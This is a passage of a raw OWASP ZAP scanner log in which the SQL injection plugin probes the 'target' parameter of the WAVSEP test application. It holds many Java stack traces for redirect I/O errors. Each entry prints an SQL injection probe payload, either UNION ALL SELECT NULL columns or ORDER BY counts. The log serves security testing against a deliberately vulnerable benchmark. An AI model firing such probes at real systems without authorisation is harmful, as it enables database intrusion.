org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962983 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962985 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962986 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962987 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 9570#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) ORDER BY 9570# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 8962988 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962989 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962991 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962993 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962995 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962995 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962997 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962998 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 8962999 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/RFI/RFI-FalsePositives-GET/validfile1.jsp) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at 